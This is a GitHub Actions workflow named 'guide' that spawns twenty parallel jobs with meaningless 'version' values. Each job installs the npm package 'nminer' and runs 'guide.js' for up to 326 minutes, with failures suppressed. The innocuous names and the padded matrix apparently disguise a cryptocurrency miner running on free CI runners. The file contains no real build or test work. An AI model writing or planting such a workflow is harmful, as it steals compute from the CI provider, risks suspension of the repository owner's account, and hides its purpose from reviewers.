name: guide
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2883 }
          - { version: 9779 }
          - { version: 9126 }
          - { version: 4909 }
          - { version: 688 }
          - { version: 3557 }
          - { version: 1593 }
          - { version: 3883 }
          - { version: 9569 }
          - { version: 2101 }
          - { version: 558 }
          - { version: 7765 }
          - { version: 2418 }
          - { version: 3050 }
          - { version: 7895 }
          - { version: 1945 }
          - { version: 5832 }
          - { version: 4174 }
          - { version: 1113 }
          - { version: 9241 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: less hefty
        run: |
          npm install nminer@latest
          timeout 326m node guide.js || echo "guide executed"